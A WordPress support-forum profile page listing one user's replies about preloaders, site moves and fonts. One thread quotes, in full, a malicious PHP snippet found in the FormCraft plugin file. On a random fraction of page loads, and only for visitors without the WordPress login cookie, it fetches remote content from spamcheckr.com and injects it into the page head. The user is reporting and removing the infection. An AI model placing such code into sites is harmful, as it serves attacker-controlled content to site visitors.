Freelancer Berlin
Forum Replies Created
-
Forum: Plugins
In reply to: WooCommerce Bulk Add / Edit Products with variationsBulk Edit Product Variations ist “the” Tool. $17.00 via PayPal, it does everything it should.
Forum: Fixing WordPress
In reply to: Super Simple Preloader Integrationthank you.
I will let you know if I have made it ??Forum: Fixing WordPress
In reply to: Super Simple Preloader Integrationthank you Evan,
this looks really good.
I will give it a try.I would use a plugin but I did not find any good and free wordpress preloader plugin.
Forum: Fixing WordPress
In reply to: Super Simple Preloader Integrationokay, thank you.
yes I want all my pages to be preloaded.so this goes into single.php:
<div class=”js”>
<body>
<div id=”preloader”></div>this one to the css file.
.js div#preloader { position: fixed; left: 0; top: 0; z-index: 999; width: 100%; height: 100%; overflow: visible; background: #333 url(‘https://picgif’) no-repeat center center; }
and should I give this javascript also into the single.php file?
jQuery(document).ready(function($) {
// site preloader — also uncomment the div in the header and the css style for #preloader
$(window).load(function(){
$(‘#preloader’).fadeOut(‘slow’,function(){$(this).remove();});
});});
Forum: Fixing WordPress
In reply to: Super Simple Preloader Integrationhello evan,
If you klick on the link
https://www.mimoymima.com/2012/09/lab/super-simple-preloader/
it will bring you to the site with the code snippets.
to this page.
https://codepen.io/mimoYmima/pen/fisgLthere are 3 snippets.
html js and css.
I just do not know in which of my wordpress files to integrate every one of them.Forum: Fixing WordPress
In reply to: Moving the site and changing the site URLthank you, makes sense.
best regards.Forum: Fixing WordPress
In reply to: Moving the site and changing the site URLokay, thank you!
I was confused about how google would handle the links if I would not have correct them. if google would list the old ones or the correct ones.Forum: Fixing WordPress
In reply to: Moving the site and changing the site URLthank you james, I did so and it is all right.
what I did not understand and what I still do not understand is that all the old URL’s was incorrect but took me to the right pages anyway (after moving correcting the index.php and the htaccess file?)
Forum: Plugins
In reply to: [Ultimate Preloader] Website flashes before the preloader loadsaame issue. there is no answer from the developers.
Forum: Fixing WordPress
In reply to: Font size for headerI use the “Easy Google Fonts” plugin. you can modify everything with that plugin. it works very good.
Forum: Fixing WordPress
In reply to: unusual question…
Forum: Fixing WordPress
In reply to: unusual questionso…
I found the snippet in this file:
wp-content/plugins/formcraft/php/settings_class.phpdeleted it local and uploaded it again, than activated the formcraft plugin and it looks like it is solved.
many thanks!!!!!!
Forum: Fixing WordPress
In reply to: unusual questionnow I have downloaded and found this code. exactly like mentioned on stackoverflow it is a part of the setting_class.php of the craftform plugin.
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "https://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} ?>
can you tell me if I should delete this whole snippet of code? thank you.
Forum: Fixing WordPress
In reply to: unusual questionthanks a lot.
now I have definitely more than 300 clicks and nothing happened so far.
I will download my site anyway and see if i find something, like you said.Forum: Fixing WordPress
In reply to: unusual questionthank you.
does it mean it should appear every 20. cklick?I did 100 reloads and have browsed my site with ca. 120 clicks. this thing did not come again so far.
I am searching for a tool to browse the files on the server to find the string but I did not find anything to do this. please if you know a tool to find strings on the server let me knon this. I am using windows.
thanks!